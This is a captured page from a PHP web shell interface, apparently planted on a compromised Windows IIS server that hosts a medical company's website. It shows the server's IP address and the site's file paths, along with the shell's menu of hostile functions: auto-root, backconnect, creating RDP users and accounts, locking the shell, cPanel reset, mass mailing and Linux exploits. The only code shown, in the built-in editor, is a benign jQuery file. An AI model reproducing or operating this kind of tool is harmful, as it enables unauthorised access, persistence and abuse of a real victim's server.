Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 3.145.104.192
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
jquery /
src /
css /
var /
[ HOME SHELL ]
Name
Size
Permission
Action
cssExpand.js
88
B
-rw-rw-rw-
getStyles.js
401
B
-rw-rw-rw-
isHiddenWithinTree.js
1.26
KB
-rw-rw-rw-
rmargin.js
65
B
-rw-rw-rw-
rnumnonpx.js
131
B
-rw-rw-rw-
swap.js
520
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : swap.js
define( function() { "use strict"; // A method for quickly swapping in/out CSS properties to get correct calculations. return function( elem, options, callback, args ) { var ret, name, old = {}; // Remember the old values, and insert the new ones for ( name in options ) { old[ name ] = elem.style[ name ]; elem.style[ name ] = options[ name ]; } ret = callback.apply( elem, args || [] ); // Revert the old values for ( name in options ) { elem.style[ name ] = old[ name ]; } return ret; }; } );
Close